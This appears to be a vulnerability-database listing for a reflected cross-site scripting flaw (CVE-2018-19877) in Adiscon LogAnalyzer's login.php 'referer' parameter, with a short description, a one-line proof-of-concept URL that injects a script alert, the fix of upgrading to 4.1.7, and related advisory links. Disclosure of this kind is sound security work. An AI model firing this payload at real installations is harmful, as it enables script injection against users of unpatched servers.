Lucene search
Gustavo Sorondo1337DAY-ID-31751HistoryDec 09, 2018 - 12:00 a.m.
Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting Vulnerability
2018-12-0900:00:00
Gustavo Sorondo
0day.today
29
EPSS
0.002
Percentile
58.6%
Exploit for php platform in category web applications
# Exploit Title: Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting
# Software Link: *httpås://loganalyzer.adiscon.com/
# <https://loganalyzer.adiscon.com/> https://github.com/rsyslog/loganalyzer
# <https://github.com/rsyslog/loganalyzer>*
# Exploit Author: Gustavo Sorondo
# Contact: http://twitter.com/iampuky
# Website: http://cintainfinita.com/
# CVE: CVE-2018-19877
# Category: webapps
# 1. Description
# Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS)
# in the 'referer' parameter of the login.php file.
# 2. Proof of Concept
http://my.loganalyzer.instance/login.php?referer=%22%3E%3Cscript%3Ealert('Cinta%20Infinita')%3C/script%3E
# 3. Solution:
# Update to version 4.1.7.
# https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
# 0day.today [2018-12-12] #Related
cve
cve
CVE-2018-19877
2018-12-05 21:29:00
ubuntucve
ubuntucve
CVE-2018-19877
2018-12-05 00:00:00
prion
prion
Design/Logic Flaw
2018-12-05 21:29:00
nuclei
nuclei
Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
2022-07-20 07:34:46
nvd
nvd
CVE-2018-19877
2018-12-05 21:29:00
cvelist
cvelist
CVE-2018-19877
2018-12-05 21:00:00
exploitpack
exploitpack
Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting
2018-12-09 00:00:00
openvas
openvas
Adiscon LogAnalyzer <= 4.1.6 XSS Vulnerability - Active Check
2018-12-12 00:00:00
exploitdb
exploitdb
Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting
2018-12-09 00:00:00
packetstorm
packetstorm
Adiscon LogAnalyzer 4.1.6 Cross Site Scripting
2018-12-07 00:00:00